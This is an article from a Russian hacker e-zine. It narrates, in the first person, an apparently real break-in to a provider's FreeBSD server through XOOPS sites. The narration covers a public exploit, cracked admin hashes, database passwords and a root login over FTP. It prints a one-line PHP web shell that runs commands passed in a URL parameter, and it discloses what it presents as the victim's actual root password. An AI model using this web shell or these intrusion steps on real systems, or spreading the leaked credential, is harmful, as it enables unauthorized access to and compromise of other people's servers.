<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Mazafaka.Ru E-zine :: Articles ::</title>
<style type="text/css">
<!--
.style2 {
	font-size: large;
	font-family: "Courier New", Courier, mono;
	font-weight: bold;
}
.style3 {font-family: "Courier New", Courier, mono}
.style4 {font-size: small}
-->
</style>
</head>

<body background="img/bgf.jpg">
<table width="900"  border="0" align="center">
  <tr>
    <th width="150" scope="col">&nbsp;</th>
    <th width="600" scope="col"><div align="center"><img src="img/uzlovaya.jpg" width="600" height="400"></div></th>
    <th width="150" scope="col">&nbsp;</th>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600" bgcolor="#CCCCCC"><p><span class="style3" id='postcolor'>&#1042; &#1101;&#1090;&#1086;&#1081; &#1089;&#1090;&#1072;&#1090;&#1100;&#1077; &#1088;&#1072;&#1089;&#1089;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1077;&#1090;&#1089;&#1103; &#1086;&#1073; &#1086;&#1076;&#1085;&#1086;&#1084; &#1074;&#1079;&#1083;&#1086;&#1084;&#1077; FreeBSD &#1084;&#1072;&#1096;&#1080;&#1085;&#1099;, &#1080; &#1087;&#1086;&#1083;&#1091;&#1095;&#1077;&#1085;&#1080;&#1080; &#1090;&#1072;&#1084; &#1084;&#1072;&#1082;&#1089;&#1080;&#1084;&#1072;&#1083;&#1100;&#1085;&#1099;&#1093; &#1087;&#1088;&#1080;&#1074;&#1077;&#1083;&#1077;&#1075;&#1080;&#1081;...&#1080; &#1085;&#1077; &#1088;&#1072;&#1079;. &#1053;&#1077;&#1090; &#1085;&#1080;&#1082;&#1072;&#1082;&#1080;&#1093; &#1087;&#1088;&#1080;&#1074;&#1072;&#1090;&#1085;&#1099;&#1093; &#1101;&#1082;&#1089;&#1087;&#1083;&#1086;&#1080;&#1090;&#1086;&#1074; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1086; &#1085;&#1077; &#1073;&#1099;&#1083;&#1086;, &#1073;&#1099;&#1083;&#1080; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1085;&#1099; &#1086;&#1096;&#1080;&#1073;&#1082;&#1080; &#1072;&#1076;&#1084;&#1080;&#1085;&#1080;&#1089;&#1090;&#1088;&#1080;&#1088;&#1086;&#1074;&#1085;&#1080;&#1103;. &#1048; &#1089;&#1077;&#1081;&#1095;&#1072;&#1089; &#1103; &#1088;&#1072;&#1089;&#1089;&#1082;&#1072;&#1078;&#1091; &#1074;&#1072;&#1084; &#1086; &#1085;&#1080;&#1093; &#1073;&#1086;&#1083;&#1077;&#1077; &#1087;&#1086;&#1076;&#1088;&#1086;&#1073;&#1085;&#1086;, &#1076;&#1083;&#1103; &#1090;&#1086;&#1075;&#1086; &#1095;&#1090;&#1086;&#1073;&#1099; &#1074;&#1099; &#1085;&#1077; &#1087;&#1086;&#1074;&#1090;&#1086;&#1088;&#1103;&#1083;&#1080; &#1101;&#1090;&#1080;&#1093; &#1086;&#1096;&#1080;&#1073;&#1086;&#1082; &#1085;&#1072; &#1089;&#1074;&#1086;&#1080;&#1093; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;&#1093;. <br>
&#1044;&#1072;&#1083;&#1100;&#1096;&#1077; &#1087;&#1086;&#1074;&#1077;&#1089;&#1090;&#1074;&#1086;&#1074;&#1072;&#1085;&#1080;&#1077; &#1073;&#1091;&#1076;&#1077;&#1090; &#1080;&#1076;&#1090;&#1080; &#1086;&#1090; &#1087;&#1077;&#1088;&#1074;&#1086;&#1075;&#1086; &#1083;&#1080;&#1094;&#1072;.</span></p>
      <p>------------------------------------------------------------</p>
      <p><span class="style3">&#1042; &#1090;&#1086;&#1090; &#1074;&#1077;&#1095;&#1077;&#1088; &#1073;&#1099;&#1083;&#1086; &#1082;&#1072;&#1082;-&#1090;&#1086; &#1089;&#1082;&#1091;&#1095;&#1085;&#1086; &#1080; &#1090;&#1086;&#1089;&#1082;&#1083;&#1080;&#1074;&#1086;, &#1080; &#1084;&#1099; &#1089; &#1087;&#1088;&#1080;&#1103;&#1090;&#1077;&#1083;&#1077;&#1084; &#1088;&#1077;&#1096;&#1080;&#1083;&#1080; &#1087;&#1086;&#1080;&#1089;&#1082;&#1072;&#1090;&#1100; &#1073;&#1072;&#1078;&#1085;&#1099;&#1077; &#1089;&#1072;&#1081;&#1090;&#1099; &#1089; &#1076;&#1074;&#1080;&#1078;&#1082;&#1086;&#1084; XOOPS. Yandex &#1085;&#1077; &#1076;&#1086;&#1083;&#1075;&#1086; &#1084;&#1091;&#1095;&#1072;&#1083;&#1089;&#1103;, &#1080; &#1091;&#1078;&#1077; &#1087;&#1086; &#1087;&#1077;&#1088;&#1074;&#1086;&#1084;&#1091; &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1091; &#1084;&#1099; &#1085;&#1072;&#1096;&#1083;&#1080; &#1085;&#1077;&#1089;&#1082;&#1086;&#1083;&#1100;&#1082;&#1086; &#1090;&#1072;&#1082;&#1080;&#1093; &#1089;&#1072;&#1081;&#1090;&#1086;&#1074;. &#1047;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1083;&#1080; &#1087;&#1091;&#1073;&#1083;&#1080;&#1095;&#1085;&#1099;&#1081; &#1101;&#1082;&#1089;&#1087;&#1083;&#1086;&#1080;&#1090; &#1086;&#1090; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; <a href="http://rst.void.ru" target="_blank">RST</a> &#1080; &#1073;&#1099;&#1089;&#1090;&#1088;&#1077;&#1085;&#1100;&#1082;&#1086; &#1087;&#1086;&#1076;&#1086;&#1073;&#1088;&#1072;&#1083;&#1080; &#1093;&#1101;&#1096;&#1080; &#1072;&#1076;&#1084;&#1080;&#1085;&#1086;&#1074;. &#1057;&#1087;&#1077;&#1088;&#1074;&#1072; &#1091; &#1085;&#1072;&#1089; &#1073;&#1099;&#1083;&#1086; &#1076;&#1074;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;, &#1085;&#1086; &#1087;&#1077;&#1088;&#1074;&#1099;&#1081; &#1086;&#1082;&#1072;&#1079;&#1072;&#1083;&#1089;&#1103; &#1085;&#1072; &#1074;&#1080;&#1085;&#1076;&#1077;, &#1072; &#1082; &#1074;&#1080;&#1085;&#1076;&#1077; &#1091; &#1085;&#1072;&#1089; &#1080;&#1085;&#1090;&#1077;&#1088;&#1077;&#1089;&#1072; &#1085;&#1077;&#1090;, &#1087;&#1086; &#1087;&#1088;&#1080;&#1095;&#1080;&#1085;&#1077; &#1090;&#1086;&#1075;&#1086; &#1095;&#1090;&#1086; &#1101;&#1090;&#1086; &#1080;&#1076;&#1080;&#1086;&#1090;&#1089;&#1082;&#1072;&#1103; &#1086;&#1089;&#1100; :-). &#1042;&#1090;&#1086;&#1088;&#1086;&#1081; &#1078;&#1077; &#1086;&#1082;&#1072;&#1079;&#1072;&#1083;&#1089;&#1103; &#1085;&#1072; FreeBSD, &#1095;&#1090;&#1086; &#1073;&#1099;&#1083;&#1086; &#1086;&#1095;&#1077;&#1085;&#1100; &#1080;&#1085;&#1090;&#1077;&#1088;&#1077;&#1089;&#1085;&#1086;.<br>
&#1047;&#1072;&#1081;&#1076;&#1103; &#1074; &#1072;&#1076;&#1084;&#1080;&#1085;&#1082;&#1091;, &#1084;&#1099; &#1088;&#1077;&#1096;&#1080;&#1083;&#1080; &#1087;&#1086;&#1080;&#1075;&#1088;&#1072;&#1090;&#1100;&#1089;&#1103; &#1089; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085;&#1072;&#1084;&#1080;. &#1047;&#1072;&#1076;&#1072;&#1095;&#1072; &#1073;&#1099;&#1083;&#1072; - &#1087;&#1086;&#1083;&#1091;&#1095;&#1080;&#1090;&#1100; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1100; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; &#1086;&#1090; &#1102;&#1079;&#1077;&#1088;&#1072; &#1087;&#1086;&#1076; &#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1084; &#1079;&#1072;&#1087;&#1091;&#1097;&#1077;&#1085; &#1072;&#1087;&#1072;&#1095; (&#1090;&#1091;&#1090; &#1080;&#1084; &#1073;&#1099;&#1083; nobody).<br>
&#1044;&#1077;&#1083;&#1086; &#1074; &#1090;&#1086;&#1084; &#1095;&#1090;&#1086; &#1090;&#1077;&#1082;&#1091;&#1097;&#1080;&#1081; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085; (&#1086;&#1085; &#1085;&#1072;&#1079;&#1099;&#1074;&#1072;&#1083;&#1089;&#1103; default) &#1088;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1073;&#1099;&#1083;&#1086; &#1085;&#1077;&#1083;&#1100;&#1079;&#1103;, &#1087;&#1086;&#1101;&#1090;&#1086;&#1084;&#1091; &#1073;&#1099;&#1083;&#1086; &#1088;&#1077;&#1096;&#1077;&#1085;&#1086; &#1089;&#1082;&#1083;&#1086;&#1085;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1101;&#1090;&#1086;&#1090; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085; &#1074; default2, &#1086;&#1090;&#1088;&#1077;&#1076;&#1072;&#1082;&#1090;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1077;&#1075;&#1086;, &#1080; &#1074;&#1099;&#1089;&#1090;&#1072;&#1074;&#1080;&#1090;&#1100; &#1074; &#1085;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1072;&#1093; &#1089;&#1072;&#1081;&#1090;&#1072; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085; &#1087;&#1086; &#1091;&#1084;&#1086;&#1083;&#1095;&#1072;&#1085;&#1080;&#1102; default2. <br>
&#1058;&#1072;&#1082; &#1080; &#1073;&#1099;&#1083;&#1086; &#1089;&#1076;&#1077;&#1083;&#1072;&#1085;&#1086;. &#1042; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085; &#1073;&#1099;&#1083;&#1072; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1077;&#1085;&#1072; &#1089;&#1090;&#1088;&#1086;&#1082;&#1072;:<br>
&lt;{php}&gt;if($_GET[id]) { system(&quot;&#036;_GET[id]&quot;)}&lt;/{php}&gt;, <br>
&#1042; &#1086;&#1073;&#1097;&#1077;&#1084;-&#1090;&#1086; &#1089;&#1090;&#1088;&#1091;&#1082;&#1090;&#1091;&#1088;&#1072; &#1096;&#1072;&#1073;&#1083;&#1086;&#1085;&#1072; &#1076;&#1086;&#1074;&#1086;&#1083;&#1100;&#1085;&#1086; &#1087;&#1086;&#1085;&#1103;&#1090;&#1085;&#1072;, &#1080; &#1074;&#1085;&#1077;&#1076;&#1088;&#1080;&#1090;&#1100; &#1074; &#1085;&#1077;&#1075;&#1086; &#1087;&#1093;&#1087;-&#1082;&#1086;&#1076; &#1085;&#1077; &#1089;&#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1083;&#1086; &#1090;&#1088;&#1091;&#1076;&#1072;.<br>
&#1048;&#1090;&#1072;&#1082;, web-shell &#1091; &#1085;&#1072;&#1089; &#1077;&#1089;&#1090;&#1100;. &#1053;&#1086; &#1087;&#1088;&#1072;&#1074;&#1072; &#1086;&#1095;&#1077;&#1085;&#1100; &#1089;&#1082;&#1091;&#1076;&#1085;&#1099;&#1077;.</span><br>
</p>
      <p><img src="img/1-uz.gif" width="593" height="450" border="1" align="middle"></p>
      <p><br>
        <span class="style3">&#1055;&#1088;&#1080;&#1089;&#1090;&#1091;&#1087;&#1072;&#1077;&#1084; &#1082; &#1080;&#1089;&#1089;&#1083;&#1077;&#1076;&#1086;&#1074;&#1072;&#1085;&#1080;&#1102; &#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1099;.<br>
&#1044;&#1083;&#1103; &#1085;&#1072;&#1095;&#1072;&#1083;&#1072; &#1090;&#1088;&#1077;&#1073;&#1086;&#1074;&#1072;&#1083;&#1086;&#1089;&#1100; &#1085;&#1072;&#1081;&#1090;&#1080; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102; &#1074; &#1082;&#1086;&#1090;&#1086;&#1088;&#1091;&#1102; &#1084;&#1086;&#1078;&#1085;&#1086; &#1073;&#1099;&#1083;&#1086; &#1087;&#1080;&#1089;&#1072;&#1090;&#1100;. &#1069;&#1090;&#1072; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1103; &#1085;&#1072;&#1096;&#1083;&#1072;&#1089;&#1100; &#1076;&#1086;&#1074;&#1086;&#1083;&#1100;&#1085;&#1086; &#1073;&#1099;&#1089;&#1090;&#1088;&#1086;. &#1042; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1102; cache, &#1073;&#1099;&#1083;&#1086; &#1079;&#1072;&#1083;&#1080;&#1090;&#1086; &#1074;&#1089;&#1077; &#1085;&#1091;&#1078;&#1085;&#1086;&#1077; &#1086;&#1088;&#1091;&#1078;&#1080;&#1077;, &#1076;&#1083;&#1103; &#1085;&#1072;&#1095;&#1072;&#1083;&#1072; &#1101;&#1090;&#1086; &#1073;&#1099;&#1083; remview, &#1080; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1041;&#1044;.<br>
&#1058;&#1077;&#1087;&#1077;&#1088;&#1100; &#1091;&#1078;&#1077; &#1084;&#1086;&#1078;&#1085;&#1086; &#1073;&#1099;&#1083;&#1086; &#1073;&#1086;&#1083;&#1077;&#1077; &#1076;&#1077;&#1090;&#1072;&#1083;&#1100;&#1085;&#1086; &#1080;&#1079;&#1091;&#1095;&#1080;&#1090;&#1100; &#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1091;, &#1072; &#1075;&#1083;&#1072;&#1074;&#1085;&#1086;&#1077; &#1073;&#1086;&#1083;&#1077;&#1077; &#1091;&#1076;&#1086;&#1073;&#1085;&#1086;. &#1055;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088;&#1077;&#1074; &#1084;&#1072;&#1089;&#1089;&#1091; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1086;&#1074; &#1080; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1081;, &#1073;&#1099;&#1083;&#1080; &#1086;&#1073;&#1085;&#1072;&#1088;&#1091;&#1078;&#1077;&#1085;&#1099; &#1085;&#1077;&#1089;&#1082;&#1086;&#1083;&#1100;&#1082;&#1086; &#1087;&#1072;&#1088;&#1086;&#1083;&#1077;&#1081; &#1082; &#1041;&#1044;, &#1074; &#1090;&#1086;&#1084; &#1095;&#1080;&#1089;&#1083;&#1077; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; root &#1082; &#1041;&#1044;. &#1056;&#1091;&#1090;&#1086;&#1074;&#1099;&#1081; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1082; &#1041;&#1044; &#1073;&#1099;&#1083; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1100;&#1085;&#1099;&#1081;, &#1085;&#1086; &#1074; &#1073;&#1072;&#1079;&#1072;&#1093; &#1085;&#1077;&#1073;&#1099;&#1083;&#1086; &#1085;&#1080;&#1095;&#1077;&#1075;&#1086; &#1080;&#1085;&#1090;&#1077;&#1088;&#1077;&#1089;&#1085;&#1086;&#1075;&#1086;, &#1085;&#1077; &#1089;&#1084;&#1086;&#1090;&#1088;&#1103; &#1085;&#1072; &#1090;&#1086; &#1095;&#1090;&#1086; &#1090;&#1072;&#1084; &#1073;&#1099;&#1083;&#1080; &#1073;&#1072;&#1079;&#1099; &#1073;&#1080;&#1083;&#1083;&#1080;&#1085;&#1075;&#1072;... &#1057;&#1077;&#1088;&#1074;&#1077;&#1088; &#1073;&#1099;&#1083; &#1086;&#1073;&#1099;&#1095;&#1085;&#1099;&#1084; &#1087;&#1088;&#1086;&#1074;&#1072;&#1081;&#1076;&#1077;&#1088;&#1086;&#1084; &#1076;&#1083;&#1103; &#1083;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1086;&#1081; &#1089;&#1077;&#1090;&#1080;. &#1053;&#1072; &#1085;&#1077;&#1084; &#1089;&#1090;&#1086;&#1103;&#1083;&#1086; 5 &#1089;&#1077;&#1090;&#1077;&#1074;&#1099;&#1093; &#1082;&#1072;&#1088;&#1090;&#33; &#1069;&#1090;&#1086; &#1073;&#1099;&#1083; &#1088;&#1086;&#1091;&#1090;&#1077;&#1088;, dhcp, dns, web-&#1089;&#1077;&#1088;&#1074;&#1077;&#1088;, &#1089;&#1077;&#1088;&#1074;&#1077;&#1088; &#1073;&#1072;&#1079; &#1076;&#1072;&#1085;&#1085;&#1099;&#1093;.. &#1074; &#1086;&#1073;&#1097;&#1077;&#1084; &#1074;&#1089;&#1077; &#1074; &#1086;&#1076;&#1085;&#1086;&#1081; &#1082;&#1091;&#1095;&#1077;... &#1053;&#1086;.. &#1074;&#1077;&#1088;&#1085;&#1077;&#1084;&#1089;&#1103; &#1082; &#1085;&#1072;&#1096;&#1077;&#1084;&#1091; &#1074;&#1079;&#1083;&#1086;&#1084;&#1091;. &#1044;&#1086;&#1089;&#1090;&#1091;&#1087; &#1082; ssh &#1073;&#1099;&#1083; &#1086;&#1090;&#1082;&#1088;&#1099;&#1090; &#1076;&#1083;&#1103; root&#33;&#33;&#33; &#1093;&#1086;&#1090;&#1103; &#1087;&#1086; &#1091;&#1084;&#1086;&#1083;&#1095;&#1072;&#1085;&#1080;&#1102; &#1085;&#1072; FreeBSD &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1076;&#1083;&#1103; &#1088;&#1091;&#1090;&#1072; &#1079;&#1072;&#1082;&#1088;&#1099;&#1090;. &#1058;&#1072;&#1082; &#1078;&#1077; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1072;&#1082;&#1077; &#1082;&#1088;&#1091;&#1090;&#1080;&#1083;&#1089;&#1103; webmin &#1085;&#1072; 10000 &#1087;&#1086;&#1088;&#1090;&#1091;. &#1055;&#1086;&#1087;&#1099;&#1090;&#1082;&#1080; &#1087;&#1088;&#1080;&#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090;&#1080;&#1090;&#1089;&#1103; &#1082; ssh &#1078;&#1077;&#1089;&#1090;&#1082;&#1086; &#1086;&#1073;&#1083;&#1072;&#1084;&#1099;&#1074;&#1072;&#1083; &#1092;&#1072;&#1101;&#1088;&#1074;&#1086;&#1083; IPFW, &#1093;&#1086;&#1090;&#1103; &#1089;&#1087;&#1077;&#1088;&#1074;&#1072; &#1084;&#1099; &#1087;&#1086;&#1076;&#1091;&#1084;&#1072;&#1083;&#1080; &#1095;&#1090;&#1086; &#1092;&#1072;&#1101;&#1088;&#1074;&#1086;&#1083; &#1090;&#1072;&#1084; &quot;&#1078;&#1077;&#1083;&#1077;&#1079;&#1085;&#1099;&#1081;&quot; (&#1074; &#1089;&#1084;&#1099;&#1089;&#1083;&#1077; &#1086;&#1090; cisco), &#1090;&#1072;&#1082; &#1082;&#1072;&#1082; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; &#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1077; &#1086;&#1085; &#1075;&#1088;&#1091;&#1079;&#1080;&#1083; &#1085;&#1086;&#1089;&#1080;&#1083;&#1080; &#1080;&#1084;&#1103; &quot;OPEN&quot;, &#1080; &#1086;&#1087;&#1103;&#1090;&#1100; &#1078;&#1077; &#1087;&#1086; &#1091;&#1084;&#1086;&#1083;&#1095;&#1072;&#1085;&#1080;&#1102; &#1101;&#1090;&#1086;&#1090; &#1085;&#1072;&#1073;&#1086;&#1088; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083; &#1076;&#1083;&#1103; &#1101;&#1090;&#1086;&#1075;&#1086; &#1092;&#1072;&#1101;&#1088;&#1072; &#1088;&#1072;&#1079;&#1088;&#1077;&#1096;&#1072;&#1077;&#1090; &#1083;&#1102;&#1073;&#1099;&#1077; &#1082;&#1086;&#1085;&#1085;&#1077;&#1082;&#1090;&#1099;. &#1058;&#1072;&#1082; &#1082;&#1072;&#1082; &#1089;&#1087;&#1077;&#1088;&#1074;&#1072; &#1084;&#1099; &#1080; &#1085;&#1077;&#1085;&#1072;&#1076;&#1077;&#1103;&#1083;&#1080;&#1089;&#1100; &#1087;&#1088;&#1086;&#1073;&#1080;&#1090;&#1089;&#1103; &#1095;&#1077;&#1088;&#1077;&#1079; &#1092;&#1072;&#1101;&#1088;, &#1090;&#1086; &#1088;&#1077;&#1096;&#1080;&#1083;&#1080; &#1087;&#1088;&#1086;&#1083;&#1077;&#1079;&#1090;&#1100; &#1095;&#1077;&#1088;&#1077;&#1079; Webmin, (&#1093;&#1086;&#1090;&#1103; &#1082; &#1085;&#1077;&#1084;&#1091; &#1082; &#1095;&#1077;&#1089;&#1090;&#1080; &#1072;&#1076;&#1084;&#1080;&#1085;&#1086;&#1074;, &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1090;&#1072;&#1082; &#1078;&#1077; &#1092;&#1080;&#1083;&#1100;&#1090;&#1088;&#1086;&#1074;&#1072;&#1083;&#1089;&#1103; &#1092;&#1072;&#1101;&#1088;&#1074;&#1086;&#1083;&#1086;&#1084; - &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074;&#1086;&#1090; &#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1083; &#1086;&#1085; &#1087;&#1086;&#1095;&#1077;&#1084;&#1091;-&#1090;&#1086; &#1073;&#1077;&#1079; ssl). &#1050; webmin&#39;&#1091; &#1084;&#1099; &#1087;&#1099;&#1090;&#1072;&#1083;&#1080;&#1089;&#1100; &#1087;&#1088;&#1086;&#1088;&#1074;&#1072;&#1090;&#1100;&#1089;&#1103; &#1095;&#1077;&#1088;&#1077;&#1079; &#1087;&#1088;&#1086;&#1082;&#1089;&#1080;&#1082; &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1085;&#1072; &#1089;&#1072;&#1084;&#1086;&#1084; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; (&#1101;&#1090;&#1086; &#1090;&#1091;&#1083;&#1079;&#1072; phpproxy), &#1085;&#1086; &#1080; &#1090;&#1091;&#1090; &#1085;&#1072;&#1089; &#1078;&#1076;&#1072;&#1083; &#1086;&#1073;&#1083;&#1086;&#1084;, &#1090;&#1072;&#1082; &#1082;&#1072;&#1082; &#1101;&#1090;&#1086;&#1090; &#1087;&#1088;&#1086;&#1082;&#1089;&#1080;&#1082; &#1085;&#1077; &#1093;&#1086;&#1090;&#1077;&#1083; &#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1090;&#1100; &#1089; &#1082;&#1091;&#1082;&#1072;&#1084;&#1080;... &#1055;&#1086;&#1089;&#1083;&#1077; &#1074;&#1089;&#1077;&#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1099;&#1093; &#1082;&#1086;&#1084;&#1073;&#1080;&#1085;&#1072;&#1094;&#1080;&#1081;, &#1087;&#1086;&#1087;&#1088;&#1086;&#1073;&#1086;&#1074;&#1072;&#1083;&#1080; &#1089;&#1082;&#1086;&#1088;&#1084;&#1080;&#1090;&#1100; &#1093;&#1101;&#1096; &#1087;&#1072;&#1088;&#1086;&#1083;&#1103; root&#39;a (&#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1081; &#1073;&#1099;&#1083; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085; &#1074; &#1076;&#1080;&#1088;&#1077;&#1082;&#1090;&#1086;&#1088;&#1080;&#1080; webmin&#39;a), JTR. &#1055;&#1088;&#1080; &#1101;&#1090;&#1086;&#1084; &#1103; &#1079;&#1072;&#1087;&#1091;&#1089;&#1090;&#1080;&#1083; &#1073;&#1088;&#1091;&#1090;&#1092;&#1086;&#1088;&#1089; &#1087;&#1086; &#1089;&#1083;&#1086;&#1074;&#1072;&#1088;&#1102; &#1080;&#1079;... 4 &#1087;&#1072;&#1088;&#1086;&#1083;&#1077;&#1081; :-), &#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1077; &#1073;&#1099;&#1083;&#1080; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1099; &#1074; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1072;&#1093; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;. &#1041;&#1088;&#1091;&#1090;&#1092;&#1086;&#1088;&#1089; &#1079;&#1072;&#1074;&#1077;&#1088;&#1096;&#1080;&#1083;&#1089;&#1103; &#1084;&#1075;&#1085;&#1086;&#1074;&#1077;&#1085;&#1085;&#1086;, &#1087;&#1086;&#1076;&#1086;&#1073;&#1088;&#1072;&#1074; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1082; root (&#1080;&#1084; &#1073;&#1099;&#1083;&#1080; &#1084;&#1072;&#1075;&#1080;&#1095;&#1077;&#1089;&#1082;&#1080;&#1077; &#1073;&#1091;&#1082;&#1074;&#1099; UzL_pWd :-), &#1101;&#1090;&#1086; &#1085;&#1072;&#1089; &#1091;&#1074;&#1077;&#1088;&#1080;&#1083;&#1086; &#1074; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1100;&#1085;&#1086;&#1089;&#1090;&#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1103; &#1082; root &#1080; &#1074; &#1090;&#1086;&#1084; &#1095;&#1090;&#1086; &#1101;&#1090;&#1086;&#1090; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1076;&#1093;&#1086;&#1076;&#1080;&#1090; &#1076;&#1083;&#1103; webmin&#39;a, &#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086; &#1080; &#1082; ssh.<br>
&#1052;&#1099; &#1087;&#1088;&#1086;&#1076;&#1086;&#1083;&#1078;&#1072;&#1083;&#1080; &#1080;&#1089;&#1082;&#1072;&#1090;&#1100; &#1074;&#1072;&#1088;&#1080;&#1072;&#1085;&#1090;&#1099;, &#1080; &#1086;&#1085;&#1080; &#1085;&#1072;&#1096;&#1083;&#1080;&#1089;&#1100;. &#1053;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1073;&#1099;&#1083; &#1092;&#1090;&#1087;, &#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1081; &#1085;&#1077; &#1092;&#1080;&#1083;&#1100;&#1090;&#1088;&#1086;&#1074;&#1072;&#1083;&#1089;&#1103; &#1092;&#1072;&#1101;&#1088;&#1086;&#1084;, &#1080; &#1082; &#1085;&#1072;&#1096;&#1077;&#1084;&#1091; &#1086;&#1075;&#1088;&#1086;&#1084;&#1085;&#1086;&#1084;&#1091; &#1086;&#1092;&#1080;&#1075;&#1077;&#1085;&#1080;&#1102; - &#1092;&#1090;&#1087; &#1087;&#1091;&#1089;&#1090;&#1080;&#1083; root&#39;a :-))... &#1084;&#1099; &#1087;&#1088;&#1080;&#1087;&#1091;&#1093;&#1083;&#1080; &#1087;&#1088;&#1086;&#1089;&#1090;&#1086;... &#1044;&#1077;&#1083;&#1086; &#1074; &#1090;&#1086;&#1084; &#1095;&#1090;&#1086; &#1080;&#1076;&#1077;&#1103; &#1079;&#1072;&#1083;&#1086;&#1075;&#1080;&#1085;&#1080;&#1090;&#1089;&#1103; &#1087;&#1086;&#1076; &#1088;&#1091;&#1090;&#1086;&#1084; &#1085;&#1072; &#1092;&#1090;&#1087; &#1076;&#1072;&#1078;&#1077; &#1085;&#1077; &#1087;&#1088;&#1080;&#1093;&#1086;&#1076;&#1080;&#1083;&#1072; &#1074; &#1075;&#1086;&#1083;&#1086;&#1074;&#1091; &#1082;&#1072;&#1082; &#1072;&#1087;&#1088;&#1080;&#1086;&#1088;&#1080; &#1072;&#1073;&#1089;&#1091;&#1088;&#1076;&#1085;&#1072;&#1103;... &#1048;&#1079;-&#1079;&#1072; &#1101;&#1090;&#1086;&#1075;&#1086; &#1080; &#1087;&#1088;&#1080;&#1096;&#1083;&#1086;&#1089;&#1100; &#1076;&#1077;&#1083;&#1072;&#1090;&#1100; &#1090;&#1072;&#1082;&#1086;&#1075;&#1086; &#1082;&#1088;&#1091;&#1075;&#1072;&#1083;&#1103; :)).</span></p>
